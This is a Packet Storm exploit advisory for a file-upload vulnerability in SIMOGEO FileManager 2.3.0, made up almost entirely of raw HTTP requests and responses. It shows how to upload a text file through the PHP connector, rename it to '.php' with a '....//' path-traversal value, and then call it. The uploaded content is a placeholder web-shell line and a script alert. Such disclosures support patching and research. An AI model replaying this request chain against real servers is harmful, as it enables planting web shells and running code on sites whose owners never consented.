SIMOGEO FileManager 2.3.0 File Upload

2016-02-12T00:00:00
ID PACKETSTORM:135743
Type packetstorm
Reporter HaHwul
Modified 2016-02-12T00:00:00

Description

                                        
                                            `# Exploit Title: SIMOGEO FileManager 2.3.0 - File Upload Vulnerability  
# Date: 2015-12-09  
# Exploit Author: HaHwul  
# Exploit Author Blog: http://www.codeblack.net  
# Vendor Homepage: https://github.com/simogeo/Filemanager  
# Software Link: git clone http://github.com/simogeo/Filemanager.git  
# Version: 2.3.0  
# Tested on: Debian [Wheezy]  
# CVE : none  
  
1. Upload File  
  
POST /vul_test/target/Filemanager/connectors/php/filemanager.php?config=filemanager.config.js HTTP/1.1  
Host: 192.168.0.15  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0  
Accept: application/json  
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
Cache-Control: no-cache  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.0.15/vul_test/target/Filemanager/  
Content-Length: 520  
Content-Type: multipart/form-data; boundary=---------------------------1675330531498115896355630737  
Connection: keep-alive  
Pragma: no-cache  
  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="mode"  
  
add  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="currentpath"  
  
/vul_test/target/Filemanager/userfiles/  
-----------------------------1675330531498115896355630737  
Content-Disposition: form-data; name="newfile"; filename="shell.txt"  
Content-Type: text/plain  
  
echo "Write PHP WebShell Code";  
<html><body><script>alert("45")</script></body></html>  
  
-----------------------------1675330531498115896355630737--  
  
  
2. Change File Extension(.txt -> .php or .html) & Upload Path Tampering(/userfiles -> /)  
  
GET /vul_test/target/Filemanager/connectors/php/filemanager.php?mode=rename&old=%2Fvul_test%2Ftarget%2FFilemanager%2Fuserfiles%2Fshell.txt&new=....//shell.php&config=filemanager.config.js HTTP/1.1  
Host: 192.168.0.15  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.4.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest  
Referer: http://192.168.0.15/vul_test/target/Filemanager/  
Connection: keep-alive  
  
  
3. Call Uploaded File  
  
http://192.168.0.15/vul_test/target/Filemanager/userfiles/shell.php  
  
Response  
HTTP/1.1 200 OK  
Date: Tue, 08 Dec 2015 17:25:20 GMT  
Server: Apache/2.2.16 (Debian)  
X-Powered-By: PHP/5.3.3-7+squeeze19  
Vary: Accept-Encoding  
Content-Length: 32  
Keep-Alive: timeout=15, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
  
echo "Write PHP WebShell Code";  
<html><body><script>alert("45")</script></body></html>  
  
  
  
`